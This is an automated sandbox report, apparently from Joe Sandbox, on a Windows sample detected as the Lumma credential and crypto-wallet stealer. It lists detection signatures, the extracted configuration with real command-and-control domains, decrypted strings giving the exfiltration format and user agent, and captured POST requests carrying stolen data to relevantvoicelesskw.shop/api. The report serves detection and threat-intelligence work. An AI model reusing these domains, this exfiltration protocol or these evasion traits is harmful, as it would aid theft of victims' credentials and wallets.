Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ag3ijL3z1w.exe

Overview

General Information

Sample name:Ag3ijL3z1w.exe
renamed because original name is a hash value
Original sample name:038f01c7ab34d20394b657ce5d5f3152.exe
Analysis ID:1414024
MD5:038f01c7ab34d20394b657ce5d5f3152
SHA1:7f82fb84c6c0aff1012675d48ba95b0558d3230f
SHA256:28119987147a63910d12662c2008089f85571817695dcd443d02303d52479c55
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Ag3ijL3z1w.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\Ag3ijL3z1w.exe" MD5: 038F01C7AB34D20394B657CE5D5F3152)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "colorfulequalugliess.shop"], "Build id": "g5MvTC--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Ag3ijL3z1w.exe PID: 7264JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Ag3ijL3z1w.exe PID: 7264JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Ag3ijL3z1w.exe PID: 7264JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              Timestamp:03/22/24-13:54:05.472247
              SID:2051588
              Source Port:49735
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:10.961651
              SID:2051588
              Source Port:49739
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:02.814250
              SID:2051587
              Source Port:57667
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:03.114371
              SID:2051588
              Source Port:49732
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:09.869399
              SID:2051588
              Source Port:49738
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:02.910864
              SID:2051586
              Source Port:63995
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:08.102502
              SID:2051588
              Source Port:49737
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:03.862026
              SID:2051588
              Source Port:49733
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:06.419545
              SID:2051588
              Source Port:49736
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:04.720277
              SID:2051588
              Source Port:49734
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:03/22/24-13:54:03.009215
              SID:2051584
              Source Port:51440
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: edurestunningcrackyow.funURL Reputation: Label: malware
              Source: edurestunningcrackyow.funURL Reputation: Label: malware
              Source: https://relevantvoicelesskw.shop/apiAAvira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/~Avira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/Avira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/api~Avira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/api6Avira URL Cloud: Label: phishing
              Source: colorfulequalugliess.shopAvira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/api0Avira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/bAvira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop:443/apiBE2NhtLOoTLNNgOkwAvira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/sAvira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/apiAvira URL Cloud: Label: malware
              Source: relevantvoicelesskw.shopAvira URL Cloud: Label: phishing
              Source: https://relevantvoicelesskw.shop/lAvira URL Cloud: Label: phishing
              Source: 0.2.Ag3ijL3z1w.exe.60000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "colorfulequalugliess.shop"], "Build id": "g5MvTC--"}
              Source: relevantvoicelesskw.shopVirustotal: Detection: 20%Perma Link
              Source: colorfulequalugliess.shopVirustotal: Detection: 20%Perma Link
              Source: wisemassiveharmonious.shopVirustotal: Detection: 9%Perma Link
              Source: https://relevantvoicelesskw.shop/Virustotal: Detection: 18%Perma Link
              Source: https://relevantvoicelesskw.shop/apiAVirustotal: Detection: 10%Perma Link
              Source: colorfulequalugliess.shopVirustotal: Detection: 20%Perma Link
              Source: https://relevantvoicelesskw.shop/api0Virustotal: Detection: 10%Perma Link
              Source: wisemassiveharmonious.shopVirustotal: Detection: 9%Perma Link
              Source: https://relevantvoicelesskw.shop/api6Virustotal: Detection: 20%Perma Link
              Source: https://relevantvoicelesskw.shop/apiVirustotal: Detection: 21%Perma Link
              Source: relevantvoicelesskw.shopVirustotal: Detection: 20%Perma Link
              Source: Ag3ijL3z1w.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: associationokeo.shop
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: turkeyunlikelyofw.shop
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: pooreveningfuseor.pw
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: edurestunningcrackyow.fun
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: detectordiscusser.shop
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: relevantvoicelesskw.shop
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: colorfulequalugliess.shop
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: wisemassiveharmonious.shop
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: colorfulequalugliess.shop
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmpString decryptor: g5MvTC--
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 0_2_00074F69 CryptUnprotectData,
              Source: Ag3ijL3z1w.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: Ag3ijL3z1w.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: number of queries: 1001
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then lea esi, dword ptr [edx+ecx]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esi+08h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then jmp eax
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A8h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, edi
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [0009DC58h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, edi
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then movzx eax, byte ptr [esi+ecx]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then test esi, esi
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then jmp ecx
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then movzx ebx, byte ptr [edx]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov eax, dword ptr [esi+00000080h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then jmp eax
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then jmp ecx
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then jmp ecx
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeCode function: 4x nop then mov edi, dword ptr [esi+0Ch]

              Networking

              barindex
              Source: TrafficSnort IDS: 2051587 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (colorfulequalugliess .shop) 192.168.2.4:57667 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2051586 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (wisemassiveharmonious .shop) 192.168.2.4:63995 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2051584 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (relevantvoicelesskw .shop) 192.168.2.4:51440 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49732 -> 172.67.147.173:443
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49733 -> 172.67.147.173:443
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49734 -> 172.67.147.173:443
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49735 -> 172.67.147.173:443
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49736 -> 172.67.147.173:443
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49737 -> 172.67.147.173:443
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49738 -> 172.67.147.173:443
              Source: TrafficSnort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49739 -> 172.67.147.173:443
              Source: Malware configuration extractorURLs: associationokeo.shop
              Source: Malware configuration extractorURLs: turkeyunlikelyofw.shop
              Source: Malware configuration extractorURLs: pooreveningfuseor.pw
              Source: Malware configuration extractorURLs: edurestunningcrackyow.fun
              Source: Malware configuration extractorURLs: detectordiscusser.shop
              Source: Malware configuration extractorURLs: relevantvoicelesskw.shop
              Source: Malware configuration extractorURLs: colorfulequalugliess.shop
              Source: Malware configuration extractorURLs: wisemassiveharmonious.shop
              Source: Malware configuration extractorURLs: colorfulequalugliess.shop
              Source: Joe Sandbox ViewIP Address: 172.67.147.173 172.67.147.173
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: relevantvoicelesskw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: relevantvoicelesskw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19496Host: relevantvoicelesskw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 9606Host: relevantvoicelesskw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: relevantvoicelesskw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7077Host: relevantvoicelesskw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1409Host: relevantvoicelesskw.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587977Host: relevantvoicelesskw.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownDNS traffic detected: queries for: colorfulequalugliess.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: relevantvoicelesskw.shop
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Ag3ijL3z1w.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Ag3ijL3z1w.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Ag3ijL3z1w.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712139420.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1744190634.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1877392777.0000000003084000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1705274256.0000000000A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/api
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1744935540.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1746473876.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1730645380.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1739179315.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1742531080.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1728879216.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741194692.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1741869098.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1729089345.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1743172054.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1744190634.0000000003089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/api0
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1771850830.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1765053909.0000000003089000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1764592696.0000000003089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/api6
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1877392777.0000000003070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://relevantvoicelesskw.shop/apiA
